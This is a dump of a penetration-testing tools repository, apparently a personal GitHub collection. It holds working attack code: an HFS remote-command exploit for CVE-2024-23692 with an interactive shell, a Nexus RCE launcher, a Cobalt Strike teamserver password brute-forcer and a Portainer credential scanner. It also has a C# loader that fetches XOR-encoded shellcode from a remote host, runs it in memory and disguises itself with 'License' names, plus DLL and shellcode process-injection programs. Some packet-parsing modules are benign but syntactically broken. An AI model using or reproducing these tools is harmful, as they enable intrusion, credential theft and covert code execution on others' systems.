| response = requests.post(url, headers=header, data=json.dumps(data), verify=False) 102 | print(response.status_code) 103 | print(response.text) 104 | 105 | 106 | if __name__ == '__main__': 107 | vuln = sys.argv[1] 108 | target = sys.argv[2] 109 | command = sys.argv[3] 110 | cookie = None 111 | try: 112 | cookie = sys.argv[4] 113 | except: 114 | cookie = "" 115 | if str(vuln) not in ["10204", "10199", "7238"]: 116 | print("漏洞选择错误") 117 | sys.exit(0) 118 | func = {"10204": cve_2020_10204, "10199": cve_2020_10199, "7238": cve_2019_7238} 119 | function = func[vuln] 120 | function(target, command, cookie) 121 | 122 | -------------------------------------------------------------------------------- /POCS/hfs_get_shell.py: -------------------------------------------------------------------------------- 1 | import http.client 2 | import chardet # type: ignore 3 | import gzip 4 | import sys 5 | from urllib.parse import quote 6 | from io import BytesIO 7 | 8 | 9 | 10 | banner = """ 11 | ********************************************************************************* 12 | * HFS OS Shell Support(HFS <= 2.3m or 2.4.0 RC7) * 13 | * Based On CVE-2024-23692 * 14 | * Author: b0b@c * 15 | ********************************************************************************* 16 | """ 17 | 18 | 19 | def print_banner(): 20 | print(banner) 21 | 22 | 23 | def get_request(target: str, payload: str, header: dict): 24 | target_list = target.split(":") 25 | if len(target_list) == 3: 26 | protocol, target_address, target_port = target_list[0], target_list[1][2:], target_list[2] 27 | protocol = protocol 28 | target_port = int(target_port) 29 | elif len(target_list) == 2: 30 | protocol, target_address = target_list[0], target_list[1][2:] 31 | protocol = protocol 32 | target_port = 0 33 | else: 34 | raise Exception("Target Error!") 35 | connection = None 36 | try: 37 | if protocol == "https": 38 | target_port = 443 if target_port == 0 else target_port 39 | connection = http.client.HTTPSConnection(target_address, target_port) 40 | elif protocol == "http": 41 | target_port = 80 if target_port == 0 else target_port 42 | connection = http.client.HTTPConnection(target_address, target_port) 43 | else: 44 | raise Exception("Target URL Error!") 45 | except Exception as error: 46 | raise error 47 | 48 | connection.request('GET', payload, headers=header) 49 | response = connection.getresponse() 50 | return response 51 | 52 | 53 | def decode_response(response): 54 | raw_content = None 55 | if response.getheader('Content-Encoding') == 'gzip': 56 | compressed_data = response.read() 57 | response_data_bytes = BytesIO(compressed_data) 58 | raw_content = gzip.GzipFile(fileobj=response_data_bytes).read() 59 | else: 60 | raw_content = response.read() 61 | # 检测编码并解码 62 | if raw_content is None: 63 | return "" 64 | detected_encoding = chardet.detect(raw_content)['encoding'] 65 | html_content = raw_content.decode(detected_encoding or 'utf-8', errors='replace') 66 | return html_content 67 | 68 | 69 | def find_result(content, command): 70 | start_index = content.find("cmd=%s&search=" % command) 71 | end_index = content.find("====\n&tpl=list") 72 | if start_index == -1 or end_index == -1: 73 | return "" 74 | content = content[start_index:end_index] 75 | result = content.split("RESULT:")[1] 76 | result = result.strip() 77 | result = result.split(":%")[0] 78 | return result 79 | 80 | 81 | 82 | def execute_command(target, command: str) -> None: 83 | payload: str = f'/?n=%0A&cmd={command}&search=%25xxx%25url%25:%password%}}{{.exec|{{.?cmd.}}|timeout=15|out=abc.}}{{.?n.}}{{.?n.}}RESULT:{{.?n.}}{{.^abc.}}===={{.?n.}}' 84 | header: dict = { 85 | 'Host': '%s:80' % str(target.split(":")[1]), 86 | 'Connection': 'keep-alive', 87 | 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0', 88 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 89 | 'Accept-Language': 'en-US,en;q=0.5', 90 | 'Accept-Encoding': 'gzip, deflate, br', 91 | 'Upgrade-Insecure-Requests': '1' 92 | } 93 | html_content = None 94 | response = None 95 | try: 96 | response = get_request(target, payload, header) 97 | except Exception as error: 98 | print("[-] Error: %s" % str(error)) 99 | if response is not None: 100 | html_content = decode_response(response) 101 | else: 102 | html_content = "" 103 | if html_content is not None and html_content != "": 104 | result = find_result(html_content, command) 105 | else: 106 | result = "" 107 | return result[0:-6] 108 | 109 | 110 | def detect(target): 111 | print("[+] Try to get target shell!") 112 | try: 113 | result = execute_command(target, "systeminfo") 114 | if result.find("Microsoft Corporation") > 0: 115 | print("[+] Get shell succeed!") 116 | except Exception as error: 117 | print("[-] Get shell failed!") 118 | sys.exit(0) 119 | 120 | 121 | 122 | def get_shell(target): 123 | target_string = target.split("://")[1].split(":")[0] 124 | while True: 125 | command = input("[%s]>>> " % target_string) 126 | if command == 'exit': 127 | sys.exit(0) 128 | command = quote(command, safe='/:?=&') 129 | print(execute_command(target, command)) 130 | 131 | 132 | 133 | if __name__ == "__main__": 134 | target = sys.argv[1] 135 | target = target [0:-1] if target[-1] == "/" else target 136 | print_banner() 137 | detect(target) 138 | get_shell(target) 139 | 140 | 141 | -------------------------------------------------------------------------------- /PacketTools/PacketStruct/PacketStruct.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | class Frame(object): 4 | def __init__(self,smac,dmac,protocol): 5 | self.smac = smac 6 | self.dmac = dmac 7 | self.protocol = protocol 8 | 9 | 10 | class Network(object): 11 | def __init__(self,sip,dip,protocol,df,mf,packetid,size,version,ttl): 12 | self.sip = sip 13 | self.dip = dip 14 | self.protocol = protocol 15 | self.df = df 16 | self.mf = mf 17 | self.packetid = packetid 18 | self.size = size 19 | self.version = version 20 | self.ttl = ttl 21 | 22 | 23 | class Transport(object): 24 | def __init__(self,sport=None,dport=None,code=None,itype=None,size=None,data=None,ack=None,seq=None,flags=None,window=None,up=None): 25 | self.sport = sport 26 | self.dport = dport 27 | self.code = code 28 | self.itype = itype 29 | self.size = size 30 | self.ack = ack 31 | self.seq = seq 32 | self.flags = flags 33 | self.window = window 34 | self.up = up 35 | 36 | class Data(object): 37 | def __init__(self,data): 38 | self.data = data 39 | 40 | 41 | class Packet(object): 42 | def __init__(self,frame,network,transport,data): 43 | self.frame = frame if isinstance(frame,Frame) else raise Exception 44 | self.network = network if isinstance(network,Network) else raise Exception 45 | self.transport = transport if isinstance(transport,Transport) else raise Exception 46 | self.data = data if isinstance(data,Data) else raise Exception 47 | -------------------------------------------------------------------------------- /PacketTools/PacketStruct/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = [ 2 | 'PacketStruct', 3 | ] 4 | -------------------------------------------------------------------------------- /PacketTools/PcapSniffer/sniffer.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | ''' 4 | 网络流量过滤和获取 5 | ''' 6 | 7 | 8 | # 全局配置ß 9 | import sys 10 | sys.path.append("..") 11 | 12 | 13 | # 引入依赖的包 14 | import pcap 15 | from ProtocolAnylast.Ethernet.EthernetAnylast import EthernetPacket 16 | from ProtocolAnylast.IPNetwork.IPAnylast import IPNetworkAnylast 17 | from ProtocolAnylast.Transport.TcpAnylast import TcpAnylast 18 | from ProtocolAnylast.Transport.UdpAnylast import UdpAnylast 19 | from ProtocolAnylast.Transport.IcmpAnylast import IcmpAnylast 20 | 21 | 22 | # 定义嗅探器 23 | class Sniffer(object): 24 | """定义抓包类""" 25 | def __init__(self,iftername): 26 | '''创建针对网卡的抓包嗅探器''' 27 | self.sniffer = pcap.pcap(name=iftername,immediate=True) 28 | 29 | 30 | def filter(self,filterString): 31 | '''设置过滤器''' 32 | self.sniffer.setfilter(filterString) 33 | 34 | def Anylast_Packet_Handler(self): 35 | for time,packet in self.sniffer: 36 | packet = EthernetPacket(packet) 37 | if packet.getType() == "IPv4": 38 | packet = IPNetworkAnylast(packet.getData()) 39 | if packet.getProcotol() == 'ICMP': 40 | packet = IcmpAnylast(packet.getData()) 41 | print packet.getCode() 42 | print packet.getType() 43 | print packet.getData() 44 | 45 | #pass 46 | 47 | if __name__ == "__main__": 48 | sniffer = Sniffer("en4") 49 | sniffer.Anylast_Packet_Handler() 50 | -------------------------------------------------------------------------------- /PacketTools/ProtocolAnylast/Application/HttpAnylast.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/b0bac/SecurityTools/b05cfa45a6de053ad0f5eb25a22c2b0a44e602be/PacketTools/ProtocolAnylast/Application/HttpAnylast.py -------------------------------------------------------------------------------- /PacketTools/ProtocolAnylast/Ethernet/EthernetAnylast.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | ''' 4 | 链路层帧解析 5 | ''' 6 | 7 | import dpkt 8 | 9 | 10 | #定义帧解析类 11 | class EthernetPacket(object): 12 | '''数据报文链路层分解''' 13 | def __init__(self,packet): 14 | '''初始化链路层数据''' 15 | self.packet = dpkt.ethernet.Ethernet(packet) 16 | 17 | @staticmethod 18 | def numhex(number): 19 | string = str(hex(number)).split('x')[-1] 20 | string = '0%s'%string if len(string) == 1 else string 21 | return string 22 | 23 | def getSrc(self): 24 | '''返回源mac地址''' 25 | return "".join(str(map(EthernetPacket.numhex,tuple(map(ord,list(self.packet.src))))))[1:-1].replace(',',':').replace("'","").replace(" ","") 26 | 27 | def getDst(self): 28 | '''返回目的mac地址''' 29 | return "".join(str(map(EthernetPacket.numhex,tuple(map(ord,list(self.packet.dst))))))[1:-1].replace(',',':').replace("'","").replace(" ","") 30 | 31 | def getType(self): 32 | '''获取数据链路层的Type''' 33 | _type = { 34 | 2048:"IPv4", 35 | 2054:"Arp", 36 | 34525:"IPv6", 37 | } 38 | return _type.get(int(self.packet.type),"未解析") 39 | 40 | def getData(self): 41 | return self.packet.data 42 | -------------------------------------------------------------------------------- /PacketTools/ProtocolAnylast/Ethernet/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = [ 2 | "EthernetAnylast", 3 | ] 4 | -------------------------------------------------------------------------------- /PacketTools/ProtocolAnylast/IPNetwork/IPAnylast.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | ''' 4 | 网络层包解析 5 | ''' 6 | 7 | import dpkt 8 | import socket 9 | 10 | 11 | #定义包解析类 12 | class IPNetworkAnylast(object): 13 | '''数据报文网络层分解''' 14 | def __init__(self,packet): 15 | '''初始化网络层数据''' 16 | self.packet = packet 17 | 18 | def getSrc(self): 19 | '''返回源IP地址''' 20 | return socket.inet_ntoa(self.packet.src) 21 | 22 | def getDst(self): 23 | '''返回目的IP地址''' 24 | return socket.inet_ntoa(self.packet.dst) 25 | 26 | def getProcotol(self): 27 | '''返回传输层协议''' 28 | return str(self.packet.get_proto(self.packet.p).__name__) 29 | 30 | def getDontFragment(self): 31 | '''返回Don't Framment的值''' 32 | return self.packet.df 33 | 34 | def getMoreFragment(self): 35 | '''返回More Framment的值''' 36 | return self.packet.mf 37 | 38 | def getID(slef): 39 | '''返回报文的ID''' 40 | return self.packet.id 41 | 42 | def getSize(self): 43 | '''获取数据包大小''' 44 | return self.packet.len 45 | 46 | def getVersion(self): 47 | '''获取数据包版本''' 48 | return self.packet.v 49 | 50 | def getTTL(self): 51 | '''获取Time To Live''' 52 | return self.packet.ttl 53 | 54 | def getData(self): 55 | '''获取传输层数据''' 56 | return self.packet.data 57 | -------------------------------------------------------------------------------- /PacketTools/ProtocolAnylast/IPNetwork/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = [ 2 | "IPAnylast", 3 | ] 4 | -------------------------------------------------------------------------------- /PacketTools/ProtocolAnylast/Transport/IcmpAnylast.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | ''' 4 | 传输层包解析 5 | ''' 6 | 7 | import dpkt 8 | 9 | 10 | #定义包解析类 11 | class IcmpAnylast(object): 12 | '''数据报文传输层分解''' 13 | def __init__(self,packet): 14 | '''初始化传输层数据''' 15 | self.packet = packet 16 | 17 | def getCode(self): 18 | '''返回ICMP Code''' 19 | return self.packet.code 20 | 21 | def getType(self): 22 | '''返回目的端口''' 23 | return self.packet.type 24 | 25 | def getData(self): 26 | '''获取传输层数据''' 27 | return self.packet.data 28 | -------------------------------------------------------------------------------- /PacketTools/ProtocolAnylast/Transport/TcpAnylast.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | ''' 4 | 传输层包解析 5 | ''' 6 | 7 | import dpkt 8 | 9 | 10 | #定义包解析类 11 | class TcpAnylast(object): 12 | '''数据报文传输层分解''' 13 | def __init__(self,packet): 14 | '''初始化传输层数据''' 15 | self.packet = packet 16 | 17 | def getSrc(self): 18 | '''返回源端口''' 19 | return self.packet.sport 20 | 21 | def getDst(self): 22 | '''返回目的端口''' 23 | return self.packet.dport 24 | 25 | def getAckNumber(self): 26 | '''返回确认号''' 27 | return self.packet.ack 28 | 29 | def getSequence(self): 30 | return self.packet.seq 31 | 32 | def getFlags(self): 33 | '''返回TCP标志位''' 34 | flags = str(bin(self.packet.flags)).split("b")[-1] 35 | size = 12 - len(flags) 36 | flags = list("%s%s"%('0'*size,str(flags))) 37 | urg = flags[6] 38 | ack = flags[7] 39 | psh = flags[8] 40 | rst = flags[9] 41 | syn = flags[10] 42 | fin = flags[11] 43 | return (urg,ack,psh,rst,syn,fin) 44 | 45 | def getWindows(self): 46 | '''返回窗口值''' 47 | return self.packet.win 48 | 49 | def getUrgentPointer(slef): 50 | '''返回报文的ID''' 51 | return self.packet.urp 52 | 53 | def getSize(self): 54 | '''获取数据包大小''' 55 | return self.packet.len 56 | 57 | def getData(self): 58 | '''获取传输层数据''' 59 | return self.packet.data 60 | -------------------------------------------------------------------------------- /PacketTools/ProtocolAnylast/Transport/UdpAnylast.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | ''' 4 | 传输层包解析 5 | ''' 6 | 7 | import dpkt 8 | 9 | 10 | #定义包解析类 11 | class UdpAnylast(object): 12 | '''数据报文传输层分解''' 13 | def __init__(self,packet): 14 | '''初始化传输层数据''' 15 | self.packet = packet 16 | 17 | def getSrc(self): 18 | '''返回源端口''' 19 | return self.packet.sport 20 | 21 | def getDst(self): 22 | '''返回目的端口''' 23 | return self.packet.dport 24 | 25 | def getSize(self): 26 | '''获取数据包大小''' 27 | return self.packet.ulen 28 | 29 | def getData(self): 30 | '''获取传输层数据''' 31 | return self.packet.data 32 | -------------------------------------------------------------------------------- /PacketTools/ProtocolAnylast/Transport/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = [ 2 | "TCP", 3 | "UDP", 4 | "ICMP" 5 | ] 6 | -------------------------------------------------------------------------------- /PacketTools/ProtocolAnylast/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = [ 2 | "Application", 3 | "Ethernet", 4 | "Transport", 5 | "IPNetwork", 6 | ] 7 | -------------------------------------------------------------------------------- /PacketTools/Stream/Stream.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | 4 | import hashlib 5 | 6 | 7 | # 定义TCP流解析类 8 | class Stream(object): 9 | '''定义TCP流解析''' 10 | def __init__(self,streamhash): 11 | self.streamhash = streamhash 12 | self._packets = [] 13 | 14 | @staticmethod 15 | def tuplehash(sip,dip,sport,dport): 16 | hashstring = sip + dip + sport + dport 17 | sha256 = hashlib.sha256() 18 | sha256.update(hashstring) 19 | return sha256.hexdigest() 20 | 21 | def addPacket(self,packet): 22 | if isinstance(packet,Packet): 23 | self._packets.append(packet) 24 | return True 25 | else: 26 | return False 27 | 28 | def getPackets(self): 29 | return slef._packets 30 | -------------------------------------------------------------------------------- /PacketTools/Stream/StreamStruct.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | 4 | # 定义TCP流解析的存储结构 5 | class StreamStruct(object): 6 | '''TCP流解析实例存储结构''' 7 | def __init__(self): 8 | '''结构初始化''' 9 | self._stream = {} 10 | self.size = 0 11 | 12 | def addStream(self,streamhash,stream): 13 | '''添加流实例''' 14 | self._stream[streamhash] = stream 15 | self.size += 1 16 | 17 | def getStream(self,streamhash): 18 | '''获取流实例''' 19 | return self._stream.get(streamhash,"None") 20 | 21 | def getHashs(self): 22 | return self._stream.keys() 23 | 24 | def getStreams(self): 25 | return self._stream 26 | -------------------------------------------------------------------------------- /PentestCode/CobaltStrikeCrack.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import ssl 3 | import time 4 | import socket 5 | import _thread 6 | 7 | PASSWORD = None 8 | 9 | class CobaltStrikeConnector: 10 | """Connect to the Teamserver of the Cobalt Strike Control Center""" 11 | def __init__(self): 12 | """Create a Cobalt Strike Connecter""" 13 | self.connector = None 14 | self.sslconnector = None 15 | self.context = ssl.SSLContext() 16 | self.context.verify_mode = ssl.CERT_NONE 17 | 18 | def isConnected(self): 19 | """Check if the client connection has been in the state of established or not""" 20 | if self.connector or self.sslconnector: 21 | return True 22 | else: 23 | return False 24 | 25 | def openConnection(self, hostname, port): 26 | """Connect to the Cobalt Strike Control Center""" 27 | self.connector = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | self.connector.settimeout(3) 29 | self.sslconnector = self.context.wrap_socket(self.connector) 30 | 31 | if hostname == socket.gethostname(): 32 | self.sslconnector.connect((socket.gethostbyname_ex(hostname)[2][0], port)) 33 | else: 34 | self.sslconnector.connect((hostname, port)) 35 | 36 | def closeConnetion(self): 37 | """Disconnect the Cobalt Strike Control Center""" 38 | if self.connector: 39 | self.connector.close() 40 | self.connector = None 41 | self.sslconnector = None 42 | 43 | def dataSend(self, data): 44 | """Send packet data to the Cobalt Strike Control Center""" 45 | if not self.sslconnector: 46 | return False 47 | try: 48 | self.sslconnector.sendall(data) 49 | except Exception as reason: 50 | return False 51 | return True 52 | 53 | def dataReceive(self): 54 | if not self.sslconnector: 55 | raise 56 | size = 0 57 | data = b"" 58 | while size < 4: 59 | buffer = self.sslconnector.recv() 60 | data += buffer 61 | size += len(buffer) 62 | return data 63 | 64 | class CobaltStrikeCracker: 65 | def __init__(self, hostname, port, password): 66 | self.hostname = hostname 67 | self.port = port 68 | self.password = password 69 | self.connector = CobaltStrikeConnector() 70 | 71 | def Crack(self): 72 | consquence = None 73 | if(len(self.password) > 0): 74 | self.connector.openConnection(self.hostname, self.port) 75 | print("[+] Try new password: " + password) 76 | data = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(bytes(password, "ascii").ljust(256, b"A")) 77 | self.connector.dataSend(data) 78 | if self.connector.isConnected(): 79 | consquence = self.connector.dataReceive() 80 | if self.connector.isConnected(): 81 | self.connector.closeConnetion() 82 | if consquence == bytearray(b"\x00\x00\xca\xfe"): 83 | global PASSWORD 84 | PASSWORD = password 85 | else: 86 | print("[-] We got password failed") 87 | 88 | def CrackThread(hostname, port, filename): 89 | try: 90 | cracker = CobaltStrikeCracker(hostname, port, filename) 91 | cracker.Crack() 92 | except Exception as reason: 93 | print("[-] Crack Thread Error!") 94 | 95 | if __name__ == "__main__": 96 | hostname = sys.argv[1] 97 | port = int(sys.argv[2]) 98 | filename = sys.argv[3] 99 | passwords = [] 100 | with open(filename, 'r') as filereader: 101 | for line in filereader.readlines(): 102 | line = line.replace("\r", "").replace("\n", "") 103 | passwords.append(line) 104 | print("[+] Config Hostname: " + hostname) 105 | print("[+] Config Service Port:" + str(port)) 106 | print("[+] Loading Passwords File: " + filename) 107 | for password in passwords: 108 | _thread.start_new_thread(CrackThread, (hostname, port, password)) 109 | time.sleep(5) 110 | if PASSWORD != None: 111 | print("[+] Cracked Succeed! Password:"+str(PASSWORD)) 112 | else: 113 | print("[-] Cracked Failed!") 114 | -------------------------------------------------------------------------------- /PentestCode/CobaltStrikeOnlineShellcodeLoader.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace svchost 8 | { 9 | using System; 10 | using System.IO; 11 | using System.Net; 12 | using System.Runtime.InteropServices; 13 | using System.Text; 14 | using System.Diagnostics; 15 | 16 | namespace Program 17 | { 18 | class Program 19 | { 20 | [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 21 | [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); 22 | [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 23 | public static string GetLicense(string host) 24 | { 25 | //byte[] arraryByte; 26 | HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create(host); 27 | request.Method = "GET"; 28 | using (HttpWebResponse web = (HttpWebResponse)request.GetResponse()) 29 | { 30 | StreamReader reader = new StreamReader(web.GetResponseStream(), Encoding.UTF8); 31 | String resource = reader.ReadToEnd(); 32 | return resource; 33 | } 34 | } 35 | 36 | public static Byte[] GetLicenseCode(string content) 37 | { 38 | return Convert.FromBase64String(content); 39 | } 40 | 41 | public static byte[] DecodeLicenseCode(byte[] input) 42 | { 43 | char[] key = { 'B', '4', }; 44 | byte[] output = new byte[input.Length]; 45 | for (int i = 0; i < input.Length; i++) 46 | { 47 | output[i] = (byte)(input[i] ^ key[i % key.Length]); 48 | } 49 | return output; 50 | } 51 | static void Main(string[] args) 52 | { 53 | string resource = GetLicense("http://192.168.1.1:8080/License.txt"); 54 | byte[] code = DecodeLicenseCode(GetLicenseCode(resource)); 55 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)code.Length, (UInt32)0x1000, (UInt32)0x40); 56 | Marshal.Copy(code, 0, (IntPtr)(funcAddr), code.Length); 57 | IntPtr hThread = IntPtr.Zero; 58 | UInt32 threadId = 0; 59 | IntPtr pinfo = IntPtr.Zero; 60 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 61 | WaitForSingleObject(hThread, 0xFFFFFFFF); 62 | } 63 | } 64 | } 65 | 66 | } 67 | -------------------------------------------------------------------------------- /PentestCode/PortainerWeakPasswordScanner.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import json 3 | import urllib3 4 | import requests 5 | import threading 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | 8 | 9 | def read_file_to_list(filename: str) -> list: 10 | try: 11 | _list: list = [] 12 | with open(filename, 'r') as file_reader: 13 | for line in file_reader.readlines(): 14 | line = line.split('\n')[0].split('\r')[0] 15 | _list.append(line) 16 | _line = list(set(_list)) 17 | return _list 18 | except Exception as error: 19 | print("[-] Read [%s] [error: %s]" % (filename, str(error))) 20 | return [] 21 | 22 | 23 | def portainer_weak_password_verify(target_url_ip: str, username: str, password: str) -> bool: 24 | target_url = target_url_ip + "/api/auth" if not target_url_ip.endswith("/") else target_url_ip + "api/auth" 25 | credentials: dict = { 26 | "username": username, 27 | "password": password 28 | } 29 | header: dict = { 30 | "User-Agent": "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36", 31 | "Accept": "application/json, text/plain, */*", 32 | "Content-Type": "application/json", 33 | "Accept-Encoding": "gzip, deflate", 34 | "Accept-Language": "zh-CN, zh; q=0.9" 35 | } 36 | data = json.dumps(credentials) 37 | try: 38 | response: requests.Response = requests.post(url=target_url, headers=header, data=data, timeout=5, verify=False) 39 | except Exception as error: 40 | print("[-] Failed [%s] [Connection Failed]" % str(target_url)) 41 | return False 42 | code: str = str(response.status_code) 43 | try: 44 | raw_text: dict = json.loads(response.text) 45 | except Exception as error: 46 | if code == "404": 47 | print("[-] Error [%s] [Response Code 404] " % target_url) 48 | else: 49 | print(response.text) 50 | return False 51 | 52 | keys: list = raw_text.keys() 53 | if code == "200" and "jwt" in keys: 54 | print("[*] Found [%s] [Username:%s, Password:%s]" % (target_url, username, password)) 55 | return True 56 | elif code == "422" or code == "403" or code == "303": 57 | try: 58 | detail = raw_text["details"] 59 | except Exception as error: 60 | print("[-] Error [%s] [Reason: %s]" % (target_url, str(error))) 61 | return False 62 | if detail == "Unauthorized": 63 | print("[-] Wrong [%s] [Username:%s, Password:%s]" % (target_url, username, password)) 64 | elif detail == "Access denied to resource": 65 | print("[-] Deny [%s] " % (target_url)) 66 | elif detail == "Administrator initialization timeout": 67 | print("[-] Error [%s] [Application Server Administrator Initialization Timeout]" % target_url) 68 | else: 69 | print(raw_text) 70 | else: 71 | print("[-] Unknown [%s] [Unknown Status Code: %s]" % (target_url, code)) 72 | return False 73 | 74 | 75 | 76 | class PortainerScanner: 77 | def __init__(self, target_ip: str, target_file=None, username_file=None, password_file=None): 78 | self.target_list = [target_ip] if target_ip is not None else [] 79 | if target_file is not None: 80 | self.target_list.extend(read_file_to_list(target_file)) 81 | self.size = len(self.target_list) 82 | self.username_list: list = read_file_to_list(username_file) if username_file is not None else ["admin", "portainer"] 83 | self.password_list: list = read_file_to_list(password_file) if password_file is not None else ["portainer", "12345678"] 84 | 85 | def scan(self): 86 | for target in self.target_list: 87 | for username in self.username_list: 88 | for password in self.password_list: 89 | thread = threading.Thread(target=portainer_weak_password_verify, args=[target, username, password]) 90 | thread.start() 91 | 92 | 93 | if __name__ == "__main__": 94 | if len(sys.argv) < 4: 95 | print("[*] Usage: Python PortainerWeakPasswordScanner.py target|targetfile usernamefile passwordfile") 96 | exit(0) 97 | target_file = sys.argv[1] 98 | target_parameter = target_file if target_file.startswith("http") else None 99 | target_file = None if target_parameter is not None else target_file 100 | username_file = sys.argv[2] 101 | password_file = sys.argv[3] 102 | scanner = PortainerScanner(target_parameter, target_file, username_file, password_file) 103 | scanner.scan() 104 | -------------------------------------------------------------------------------- /PentestCode/ProcessDLLInjection.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "stdlib.h" 6 | #pragma comment(lib,"ws2_32.lib") 7 | #pragma comment (lib,"Advapi32.lib") 8 | #pragma comment (lib,"Iphlpapi.lib") 9 | #pragma comment(lib, "Psapi.lib") 10 | #pragma comment(lib, "user32.lib") 11 | #pragma comment(lib, "userenv.lib") 12 | 13 | using namespace std; 14 | 15 | int main(int argc, char* argv[]) { 16 | DWORD ProcessID = atoi(argv[1]); 17 | cout << ProcessID << endl; 18 | HANDLE CurrentToken; 19 | LUID SeDebugNameValue; 20 | TOKEN_PRIVILEGES TokenProvoleges; 21 | 22 | if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &CurrentToken)){ 23 | cout << "We Need Administrator Priveileges!" << endl; 24 | return 0; 25 | } 26 | 27 | if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &SeDebugNameValue)) { 28 | CloseHandle(CurrentToken); 29 | cout << "We Need Administrator Priveileges!" << endl; 30 | return 0; 31 | } 32 | 33 | TokenProvoleges.PrivilegeCount = 1; 34 | TokenProvoleges.Privileges[0].Luid = SeDebugNameValue; 35 | TokenProvoleges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 36 | 37 | if (!AdjustTokenPrivileges(CurrentToken, FALSE, &TokenProvoleges, sizeof TokenProvoleges, NULL, NULL)) { 38 | CloseHandle(CurrentToken); 39 | cout << "We Need Administrator Priveileges!" << endl; 40 | return 0; 41 | } 42 | 43 | CloseHandle(CurrentToken); 44 | 45 | HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessID); 46 | if (hProcess == 0) { 47 | cout << "[-] Open Process Failed! Got System Error Code: " << GetLastError() << endl; 48 | CloseHandle(hProcess); 49 | return 0; 50 | } 51 | char* DLLFileName = argv[2]; 52 | DWORD Size = 1 + lstrlen((LPCWSTR)DLLFileName); 53 | LPVOID DLLAddr = NULL; 54 | DLLAddr = VirtualAllocEx(hProcess, NULL, Size, MEM_COMMIT, PAGE_READWRITE); 55 | if (DLLAddr == NULL) { 56 | cout << "[-] Memory Alloc Failed! Got System Error Code: " << GetLastError() << endl; 57 | CloseHandle(hProcess); 58 | return 0; 59 | } 60 | if (!WriteProcessMemory(hProcess, DLLAddr, DLLFileName, Size, NULL)) { 61 | cout << "[-] Write Process Memory Failed! Got System Error Code: " << GetLastError() << endl; 62 | CloseHandle(hProcess); 63 | return 0; 64 | } 65 | 66 | HMODULE hModule = GetModuleHandle(_T("kernel32.dll")); 67 | 68 | cout << hModule << ":-:" << GetLastError() << endl; 69 | 70 | FARPROC pFuncProcAddr = GetProcAddress(hModule, (LPCSTR)"LoadLibraryA"); 71 | if (pFuncProcAddr == NULL) { 72 | cout << "[-] Get Process Address Failed! Got System Error Code: " << GetLastError() << endl; 73 | CloseHandle(hProcess); 74 | return 0; 75 | } 76 | 77 | HANDLE RemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFuncProcAddr, DLLAddr, 0, NULL); 78 | if (RemoteThread == NULL) { 79 | cout << "[-] Create Remote Thread Failed! Got System Error Code: " << GetLastError() << endl; 80 | CloseHandle(hProcess); 81 | return 0; 82 | } 83 | cout << "[+] Process Injection Succeed!" << endl; 84 | return 0; 85 | } 86 | -------------------------------------------------------------------------------- /PentestCode/ProcessShellcodeInjection.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "stdlib.h" 6 | #pragma comment(lib,"ws2_32.lib") 7 | #pragma comment (lib,"Advapi32.lib") 8 | #pragma comment (lib,"Iphlpapi.lib") 9 | #pragma comment(lib, "Psapi.lib") 10 | #pragma comment(lib, "user32.lib") 11 | #pragma comment(lib, "userenv.lib") 12 | 13 | using namespace std; 14 | 15 | /* length: 795 bytes */ 16 | unsigned char buf[] = {} 17 | int main(int argc, char* argv[]) { 18 | DWORD ProcessID = atoi(argv[1]); 19 | HANDLE CurrentToken; 20 | LUID SeDebugNameValue; 21 | TOKEN_PRIVILEGES TokenProvoleges; 22 | 23 | if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES 